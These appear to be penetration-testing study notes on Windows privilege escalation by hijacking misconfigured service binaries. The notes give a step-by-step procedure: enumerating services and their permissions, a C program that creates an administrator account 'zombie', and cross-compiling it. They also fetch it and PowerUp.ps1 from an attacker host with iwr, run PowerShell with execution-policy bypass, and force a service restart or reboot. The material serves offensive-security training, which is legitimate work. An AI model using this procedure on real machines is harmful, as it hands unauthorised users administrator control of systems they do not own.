5. Service Hijacking

• A Windows Service is a long-running background executable or application managed by the Service Control Manager.
• They are similar to daemons on Unix
• Windows Services can be managed by the Services snap-in, PowerShell, or sc.exe.
• Services are run by LocalSystem (NT AUTHORITY, SYSTEM, BUILTIN), Network Service, and Local Service user accounts.
• Users or programs creating a service can choose either one of those accounts, a domain user, or a local user.

Writable Files + Directories

Writable files from root directory:

cmd /c 'dir C:\ /a-r-d /s /b'

Writable directories from root directory:

cmd /c 'dir C:\ /ad-r /s /b'

Manual Service Binary Hijacking

• Each Windows service has an associated binary file.
• They are executed when the service is started or transitioned into a running state.
• An unprivileged user can tamper with misconfigured services being run by higher authority to privesc.
• Look for services with binaries outside of the System32 folder, since they are probably installed and configured by the user manually.

1. Enumerate running processes to identify any to abuse:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Alt. Get-Service ... Get-WmiObject ... services.msc

2. Enumerate permissions for the identified services:

icacls "C:\xampp\apache\bin\httpd.exe"

Alt. Get-ACL

Permissions:
F: Full access
M: Modify access
RX: Read and execute access
R: Read-only access
W: Write-only access

3. Create malicious binary. Example in C which will create a new user:

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user zombie password123! /add");
  i = system ("net localgroup administrators zombie /add");
  
  return 0;
}

4. Cross-compile it to an 64-bit .exe for Windows:

x86_64-w64-mingw32-gcc <file>.c -o <file>.exe

5. Serve the binary, download it, and move it to the correct directory:

iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move <pre-path> <post-path>

6. Try to restart the service manually (if permissioned):

net stop <servicename>
net start <servicename>

#Or run:
Restart-Service <servicename>

#Service name is not the binary file

7. If not possible check if it starts again on reboot:

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<servicename>'}

8. Check if is privileged to restart system (the state should not matter):

whoami /priv

9. Issue a system reboot using:

shutdown /r /t 0

10. Remember to repair the binary after escalation!

Automatic Service Hijacking with PowerUp:

1. Serve the PowerUp.ps1 on your kali machine.
2. Download the script:

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1

4. Run the script with bypass:

 powershell -ep bypass
 . .\PowerUp.ps1

5. Now check modifiable services identified:

Get-ModifiableServiceFile

6. Try to use the built-in AbuseFunction to install a service binary (where name is Service Name listed from above command):

Install-ServiceBinary -Name 'mysql'

7. Win!